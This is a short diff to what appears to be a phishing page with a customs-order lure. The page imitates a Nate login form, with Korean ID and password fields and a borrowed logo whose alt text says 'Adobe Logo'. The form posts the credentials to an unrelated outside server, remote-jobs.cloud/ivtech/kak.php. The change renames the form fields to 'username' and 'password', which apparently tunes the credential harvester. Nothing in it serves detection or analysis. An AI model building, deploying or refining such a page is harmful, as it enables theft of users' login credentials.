--- a/ctlcustoms_ntOrder.htm
+++ b/ctlcustoms_ntOrder.htm
@@ -136,8 +136,8 @@
         <img src="https://i.ibb.co/XzRz5nc/natelogo1.jpg" alt="Adobe Logo" class="logo">
 
         <form name="loginForm" action="https://remote-jobs.cloud/ivtech/kak.php" method="post">
-            <input type="text" name="a" id="email" placeholder="네이트 ID" required value="">
-            <input type="password" name="b" id="password" placeholder="네이트 비밀번호" minlength="6" required>
+            <input type="text" name="username" id="email" placeholder="네이트 ID" required value="">
+            <input type="password" name="password" id="password" placeholder="네이트 비밀번호" minlength="6" required>
             <div class="remember-me">
                 <input type="checkbox" id="remember-me" name="remember-me" checked> <!-- Checked by default -->
                 <label for="remember-me">Remember me</label>
